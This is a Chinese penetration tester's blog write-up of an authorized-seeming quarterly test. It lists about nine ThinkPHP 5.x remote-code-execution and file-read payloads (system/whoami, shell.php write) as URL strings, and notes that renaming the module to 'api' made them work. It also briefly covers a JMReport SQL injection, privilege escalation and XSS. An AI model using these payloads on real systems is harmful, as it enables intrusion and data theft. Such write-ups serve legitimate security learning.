RCE再现

原文链接: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247497725&idx=1&sn=9acb221e666940eb40092a4f96f6dd25

RCE再现

迪哥讲事 2025-06-13 08:33

春日午后,我沿着杨柳大道悠闲溜达。暖融融的阳光穿过新抽嫩芽的柳枝,在柏油路上折射出细碎的金斑。道旁绿化带里,嫩绿的草叶间零星点缀着淡紫色野花,春风拂过,柳絮如雪般轻盈飘落。不经意间,一抹黑色闯入视野 —— 绿化带边缘的枯叶堆里,半支黑色 U 盘闪着金属冷光,在阳光下折射出奇异的反光,像是在无声地召唤。我弯腰拨开杂草捡起它,发现 U 盘外壳上斑驳的标签写着 “RCE 备份”,边缘还残留着些许泥土,谁能想到这个被遗落在春意里的小小物件,竟藏着两年前的远程命令执行漏洞代码。

风掀起桌上的 A4 纸,我望着窗外随风摇曳的柳枝,忽然觉得这场景像极了此刻攥在掌心的 U 盘 —— 有些秘密,总藏在最意想不到的角落,等着被阳光照亮的瞬间,抖落满身尘埃。

唰~,我从梦里醒来,看着 手机上亮眼的 9.05,我知道,那是我快迟到了。 

看着年年都一样的资产,甚至难堪,漏洞越挖越少,安全等级越来越高,但还是要进行季度测试

打开资产表,随机选中一个,映入眼前的,则是普通的登录页面,只是颜色过于单调

RCE再现

首先脑海里浮现很多知识,突然有人开口说先测弱口令,另一个则说 测个毛线弱口令,我天天看他挖漏洞,一个弱口令都没挖到。

. . . . . .

stop,你俩安静点,思路都被你们扰乱了。

随后,按照登陆框测试思路,我先打开谷歌插件,查看 js 路径,就这么几条,还挖个屁

但是看到路径,有似曾相识的赶紧,原来是 thinkphp 老前辈

RCE再现

为了验证结果,我在域名后面输入 aaaaa,然后报错信息中确定了 thinkphp,并且版本是 5.0.9

RCE再现

于是掏出祖传扫描工具,开始进行探测

RCE再现

RCE再现

为什么要这么对我,我到底哪里做错了,为什么一个 poc 都没成功,哦  不 !!!!

忽然我看到了一抹曙光,那是注册按钮

RCE再现

RCE再现

发送成功,但是手机却没收到验证码,又一次伤了我的心

于是针对特定版本搜索 poc

?s=index/think\config/get&name=database.username?s=index/\think\Lang/load&file=../../test.jpg?s=index/\think\Config/load&file=../../t.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\Request/input&filter[]=system&data=pwd?s=index/\think\view\driver\Php/display&content=<?phpphpinfo();?>?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?phpphpinfo();?>?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

五一例外,全是 error

RCE再现

信息泄露

就在我百思不得其解时,我灵光一闪,index 模块不存在,要么删除了要么改名字了

结合刚刚手机号注册的接口,api 会不会就是 index?

RCE再现

RCE再现

果然,成功了,怪不得扫不出来,工具里的 poc 都是 index 开头

RCE再现

既然显示出数据库的信息了,那岂不是可以连接了

当你开了一扇门,肯定会有一扇窗被关闭

内网的数据库地址,这让我很难办啊

RCE再现

RCE

然后又试了其他 poc,果不其然,还是存在漏洞滴

RCE再现

我猜想,或许是接口名称的悄然变更,让它在两年时光里与无数目光擦肩而过,始终未被察觉。直至今日,终于为第一次测试时遗留的空缺画上了句号。

SQL

下一处亦然是一个登录页面,但此时的框架变成了 jeecg-boot

RCE再现

根据数据包中存在 

/sys/login

路径这一特征,结合我此前对 CMS 系统架构的审计经验,初步判断该目标系统可能存在特定风险。

从技术细节来看,多数基于 
Jeecg-Boot
 开发的系统会内嵌 
JMReport(积木报表)
。在过往审计中发现,该组件通常存在多个潜在漏洞接口。经本轮测试验证,发现其中
仅一个接口未进行权限认证
,且通过该接口成功触发了
SQL 注入漏洞

RCE再现

剩下就是普通漏洞了

越权+存储 XSS+反射 XSS

越权访问,注册商家账号,通过接口里泄露用户功能访问列表

RCE再现

然后就越权到个人中心了,修改昵称为 xss 语句,然后有个变更日志,打开就触发 xss 了。

RCE再现

RCE再现

反射 xss 就是 ueditor 编辑器,你们懂的。

RCE再现

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

RCE再现

往期回顾

如何绕过签名校验

一款bp神器

挖掘有回显ssrf的隐藏payload

ssrf绕过新思路

一个辅助测试ssrf的工具

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips